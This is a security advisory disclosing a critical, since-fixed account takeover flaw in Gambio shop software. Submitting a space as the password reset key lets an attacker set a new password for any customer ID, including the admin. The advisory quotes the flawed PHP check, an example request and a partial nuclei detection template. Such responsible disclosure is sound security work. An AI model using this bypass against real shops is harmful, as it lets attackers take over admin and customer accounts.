usd-2024-0002 | Gambio - Account Takeover

Product: Gambio
Affected Version: (with Security Update 2024-01 v1.0)
Vulnerability Type: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
Security Risk: Critical
Vendor URL:
Vendor Status: Fixed
CVE number: Pending


Gambio is a software program that is specifically designed for running online shops.
It provides various features and tools to help businesses manage their inventory, process orders, and handle customer interactions.

According to their homepage, the software is used by more then 25.000 shops.

The password reset functionality checks for the existence of a password recovery token.
However, this check can be bypassed with a space character ("%20").

Proof of Concept

The password reset functionality utilizes the password_double_opt.php file with multiple possible actions defined in the "action" parameter.
The file loads the file and executes the proceed method.

If the action is set to save_password, a database query is performed to fetch the customer specified in the POST parameter customers_id with the reset token defined in the key parameter.
Attackers can submit the customers_id as an integer, where the initial admin account usually has the id set to "1".

In line 138 of the file, the application checks if the previous database query returns results, or if the key is an empty string.

if (!xtc_db_num_rows($check_customer_query) || $this->v_data_array['POST']['key'] == "")
$case = 'no_account';}
$newpass = $this->v_data_array['POST']['newPassword'];

The If-Statement shown in line 1 of the snippet above, can be bypassed to return "false", by submitting a space character ("%20") as the key.
The password provided in the request is set without knowing the key to the customer defined in customers_id.

An example request is shown below:

POST /password_double_opt.php?action=save_password HTTP/1.1
Host: localhost[...]


A nuclei template was created to test for the vulnerability:

id: gambio-account-takeover
name: Account Takeover in Gambio
description: Account Takeover in Gambio
tags: gambio,php,intrusive
author: ChristianPoeschl,EdwinHoffmann
severity: critical
customerid: 1
password: "somethingreallylong123"
- raw:
- |
POST /password_double_opt.php?action=save_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
- type: status
- 302
- type: word
part: header
- "GXsid_"


The password reset token should be properly validated.



2024-01-17: Vulnerability identified by Christian Poeschl and Edwin Hoffmann.
2024-01-26: First contact request via email to .
2024-01-26: Received an update by Gambio that the incident is in internal review and will be fixed in an upcoming release.
2024-02-14: Gambio fixes this issue.
2024-04-24: This advisory is published.


This security vulnerability was identified by Christian Poeschl, Edwin Hoffmann of usd AG.